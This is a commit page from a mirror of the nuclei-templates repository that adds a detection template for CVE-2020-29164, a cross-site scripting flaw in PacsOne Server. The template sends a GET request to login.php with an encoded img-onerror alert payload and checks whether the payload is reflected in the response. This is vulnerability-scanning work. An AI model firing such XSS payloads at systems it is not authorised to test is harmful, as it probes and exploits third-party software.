daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Create CVE-2020-29164.yaml

patch-1
Geeknik Labs 2021-03-17 15:35:41 +00:00 committed by GitHub
parent c4d429cc10
commit 0678fd7330
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 26 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
cves/2020/CVE-2020-29164.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2020-29164
info:
name: PacsOne Server XSS
description: PacsOne Server (PACS Server In One Box) below 7.1.1 is affected by cross-site scripting (XSS).
author: geeknik
severity: medium
tags: pacsone,xss,cve,cve2020
requests:
- method: GET
path:
- "{{BaseURL}}/Pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"
matchers-condition: and
matchers:
- type: status
status:
- 301
- 302
negative: true
- type: word
words:
- "<img src="" onerror="alert(1);">1</img>"
part: body